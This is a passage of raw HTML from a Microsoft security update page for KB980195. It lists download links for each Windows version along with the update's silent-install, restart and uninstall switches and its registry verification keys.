class=\"sbody-h4\">For Windows Server 2008 R2 for Itanium-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/7/5/5/755a2ed9-f06e-41b7-abb7-e5c75e536aab/windows6.1-kb980195-ia64.msu\" id=\"kb-link-10\" target=\"_self\">Download the Windows6.1-KB980195-ia64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 R2 for x64-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/8/9/5/8957dea8-4f4e-44ec-adb5-98a523cabbf1/windows6.1-kb980195-x64.msu\" id=\"kb-link-11\" target=\"_self\">Download the Windows6.1-KB980195-x64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Vista, for Windows Vista Service Pack 1, and for Windows Vista Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/2/d/3/2d37d4b9-276a-46d1-95ba-e0ff63c180a1/windows6.0-kb980195-x86.msu\" id=\"kb-link-12\" target=\"_self\">Download the Windows6.0-KB980195-x86.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Vista x64 Edition, for Windows Vista x64 Edition Service Pack 1, and for Windows Vista x64 Edition Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/2/c/8/2c8f9707-9241-495d-8830-e2139bc6384b/windows6.0-kb980195-x64.msu\" id=\"kb-link-13\" target=\"_self\">Download the Windows6.0-KB980195-x64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 for 32-bit systems and for Windows Server 2008 for 32-bit systems Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/b/d/9/bd96cceb-e37c-4f75-82d8-83e89f3b940d/windows6.0-kb980195-x86.msu\" id=\"kb-link-14\" target=\"_self\">Download the Windows6.0-KB980195-x86.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 for Itanium-based systems and for Windows Server 2008 for Itanium-based systems Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/b/c/5/bc50034d-53ac-4fe6-9159-f49c71757fb5/windows6.0-kb980195-ia64.msu\" id=\"kb-link-15\" target=\"_self\">Download the Windows6.0-KB980195-ia64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2008 for x64-based systems and for Windows Server 2008 for x64-based systems Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/0/b/b/0bbbee8a-b4f1-4ecc-8953-fb05422d827c/windows6.0-kb980195-x64.msu\" id=\"kb-link-16\" target=\"_self\">Download the KB980195-x64.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows XP Service Pack 2 and for Windows XP Service Pack 3</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/0/7/a/07ab5bdc-10c5-4716-b6b4-cc85be71b8e9/windowsxp-kb980195-x86-enu.exe\" id=\"kb-link-17\" target=\"_self\">Download the WindowsXP-KB980195-x86-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows XP Professional x64 Edition Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/5/b/a/5baded09-3767-4c52-b485-2c2c3f922958/windowsserver2003.windowsxp-kb980195-x64-enu.exe\" id=\"kb-link-18\" target=\"_self\">Download the WindowsServer2003.WindowsXP-KB980195-x64-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2003 Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/3/8/3/38325aa7-a5cb-40fc-9786-8ef743877d99/windowsserver2003-kb980195-x86-enu.exe\" id=\"kb-link-19\" target=\"_self\">Download the WindowsServer2003-KB980195-x86-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2003 with SP2 for Itanium-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/9/4/a/94a3fc29-3c52-4269-994b-8d8185ef8059/windowsserver2003-kb980195-ia64-enu.exe\" id=\"kb-link-20\" target=\"_self\">Download the WindowsServer2003-KB980195-ia64-ENU.exe package now.</a></span><h4 class=\"sbody-h4\">For Windows Server 2003 x64 Edition Service Pack 2</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/0/5/d/05d9a3c8-fc4c-448f-8c46-e5e04ff19126/windowsserver2003.windowsxp-kb980195-x64-enu.exe\" id=\"kb-link-21\" target=\"_self\">Download the WindowsServer2003.WindowsXP-KB980195-x64-ENU.exe package now.</a></span><br/><br/><span>Release Date: June 8, 2010<br/><br/>For more information about how to download Microsoft support files, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/119591\" id=\"kb-link-23\">119591 </a> How to obtain Microsoft support files from online services</span></div><span>Microsoft scanned this file for viruses. Microsoft used the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to the file.</span><h3 class=\"sbody-h3\">Security update deployment</h3><h4 class=\"sbody-h4\">Windows 2000 (all versions)</h4><h5 class=\"sbody-h5 text-subtitle\">Reference table</h5>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue may be included in a future update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>Windows2000-KB980195-x86-ENU/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>Windows2000-KB980195-x86-ENU/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Update log file</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>KB980195.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/>Use the <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel, or use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB980195$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">Windows 2000 with Service Pack 4:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows 2000\\SP5\\KB980195\\Filelist</strong></td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the update</h5><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-24\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Supported security update installation switches</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/overwriteoem</td><td class=\"sbody-td\">Overwrites OEM files without prompting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/nobackup</td><td class=\"sbody-td\">Does not back up files that are needed for uninstallation.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/extract[:<strong class=\"sbody-strong\">path</strong>]</td><td class=\"sbody-td\">Extracts files, and the Setup program is not started.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/ER</td><td class=\"sbody-td\">Enables extended error reporting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/verbose</td><td class=\"sbody-td\">Enables verbose logging. During installation, creates a %Windir%\\CabBuild.log. This log details the files that are copied. By using this switch, the installation may run slower.</td></tr></tbody></table></div><span class=\"text-base\">Note</span> You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses.<br/><span>For more information about the installation switches that are supported, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/262841\" id=\"kb-link-25\">262841 </a>Command-line switches for Windows software update packages</span></div><h5 class=\"sbody-h5 text-subtitle\">Removing the update</h5>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Supported Spuninst.exe switches</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr></tbody></table></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li><li><span class=\"text-base\">Registry subkey verification</span><br/><br/>You may also be able to verify the files that this security update has installed by reviewing the registry subkeys that are listed in the reference table in this section. These registry subkeys may not contain a complete list of files that are installed. Also, these registry subkeys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.</li></ul><h3 class=\"sbody-h3\">Windows XP (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without requiring user intervention</td><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3:<br/>Windowsxp-KB980195-x86-enu/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu/quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3:<br/>Windowsxp-KB980195-x86-enu/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu/norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Update log file</td><td class=\"sbody-td\">All supported versions of Windows XP and Windows XP Professional:<br/>KB980195.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">Not applicable.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">All supported versions of Windows XP and Windows XP Professional:<br/>Use the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel, or use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB980195$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">Windows XP Service Pack 2 and Windows XP Service Pack 3:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows XP\\SP4\\KB980195\\Filelist</strong></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows XP Professional and Windows XP Professional Service Pack 2, x64-based versions:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows XP Version 2003\\SP3\\KB980195\\Filelist</strong></td></tr></tbody></table></div><span class=\"text-base\">Note</span> The security update for supported versions of Windows XP Professional x64 Edition is the same as the security update for supported versions of Windows Server 2003 x64 Edition.<br/><br/>\u00a0<h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the update</h5><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-26\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/overwriteoem</td><td class=\"sbody-td\">Overwrites OEM files without prompting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/nobackup</td><td class=\"sbody-td\">Does not back up files that are needed for uninstallation.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/integrate:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Integrates the update into the Windows source files. These files are located by using the path that is specified in the switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/extract[:<strong class=\"sbody-strong\">path</strong>]</td><td class=\"sbody-td\">Extracts files, and the Setup program is not started.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/ER</td><td class=\"sbody-td\">Enables extended error reporting.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/verbose</td><td class=\"sbody-td\">Enables verbose logging. During installation, creates a %Windir%\\CabBuild.log. This log details the files that are copied. By using this switch, the installation may run slower.</td></tr></tbody></table></div><span class=\"text-base\">Note</span> You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses.<br/><span>For more information about the supported installation switches, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/262841\" id=\"kb-link-27\">262841 </a>Command-line switches for Windows software update packages</span></div><h5 class=\"sbody-h5 text-subtitle\">Removing the update</h5>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/passive</td><td class=\"sbody-td\">Unattended Setup mode. No user interaction is required, but the installation status is displayed. If a restart is required at the end of Setup, a dialog box is presented to the user by using a timer warning. This warning says that the computer will restart in 30 seconds.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/quiet</td><td class=\"sbody-td\">Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/norestart</td><td class=\"sbody-td\">Does not restart the computer when the installation has completed.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forcerestart</td><td class=\"sbody-td\">Restarts the computer after installation and forces other applications to close when the computer shuts down. Open files are not saved when the applications close.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/warnrestart[:<strong class=\"sbody-strong\">x</strong>]</td><td class=\"sbody-td\">Presents a dialog box to the user together with a timer warning that the computer will restart in <strong class=\"sbody-strong\">x</strong> seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/promptrestart</td><td class=\"sbody-td\">Displays a dialog box that prompts the local user to allow for a restart.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Special options</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/forceappsclose</td><td class=\"sbody-td\">Forces other programs to close when the computer shuts down.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/log:<strong class=\"sbody-strong\">path</strong></td><td class=\"sbody-td\">Allows for the redirection of installation log files.</td></tr></tbody></table></div><h5 class=\"sbody-h5 text-subtitle\">Verifying that the update was applied</h5><ul class=\"sbody-free_list\"><li><span class=\"text-base\">Microsoft Baseline Security Analyzer</span><br/><br/>To verify that a security update was applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the \"Detection and deployment tools and guidance\" section for more information.</li><li><span class=\"text-base\">Registry subkey verification</span><br/><br/>You may also be able to verify the files that this security update has installed by reviewing the registry subkeys listed in the reference table in this section. These registry subkeys may not contain a complete list of installed files. Also, these registry subkeys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.</li></ul><h3 class=\"sbody-h3\">Windows Server 2003 (all versions)</h3><h4 class=\"sbody-h4\">Reference table</h4>The following table contains the security update information for this software. You can find more information in the \"Deployment information\" section.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Inclusion in future service packs</th><th class=\"sbody-th\">The update for this issue will be included in a future service pack or update rollup</th></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Deployment</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing with requiring user intervention</td><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2:<br/>Windowsserver2003-KB980195-x86-enu /quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu /quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems:<br/>Windowsserver2003-KB980195-ia64-enu /quiet</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Installing without restarting</td><td class=\"sbody-td\">Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2:<br/>Windowsserver2003-KB980195-x86-enu /norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 and Windows Server 2003 Service Pack 2, x64-based versions:<br/>WindowsServer2003.WindowsXP-KB980195-x64-enu /norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">Windows Server 2003 with SP1 for Itanium-based systems and Windows Server 2003 with SP2 for Itanium-based systems:<br/>Windowsserver2003-KB980195-ia64-enu /norestart</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Update log file</td><td class=\"sbody-td\">All supported Windows Server 2003 x86-based versions, x64-based versions, and Itanium-based versions of Windows Server 2003:<br/>KB980195.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">More information</td><td class=\"sbody-td\">See the \"Detection and deployment tools and guidance\" section.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Restart requirement</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart required?</td><td class=\"sbody-td\">In some cases, this update does not require a restart. If a restart is required, you receive a message that advises you to restart.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hotpatching</td><td class=\"sbody-td\">This security update does not support Hotpatching. For more information about Hotpatching, see Microsoft Knowledge Base Article 897341.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">\u00a0</td><td class=\"sbody-td\">\u00a0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">All supported x86-based versions, x64-based versions, and Itanium-based versions of Windows Server 2003:<br/>Use the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel, or use the Spuninst.exe utility that is located in the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB980195$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry subkey verification</td><td class=\"sbody-td\">All supported versions of Windows Server 2003:<br/><strong class=\"sbody-strong\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP3\\KB980195\\Filelist</strong></td></tr></tbody></table></div><h4 class=\"sbody-h4\">Deployment information</h4><h5 class=\"sbody-h5 text-subtitle\">Installing the Update</h5><span>For more information about software update terminology, click the following article number to view the article in the Microsoft Knowledge Base:</span><br/>\u00a0<div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/824684\" id=\"kb-link-28\">824684 </a> Description of the standard terminology that is used to describe Microsoft software updates</span></div>This security update supports the following setup switches.<br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">Switch</th><th class=\"sbody-th\">Description</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">/help</td><td class=\"sbody-td\">Displays the command-line options.</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">\u00a0</th><th class=\"sbody-th\">Setup modes</th></tr><tr 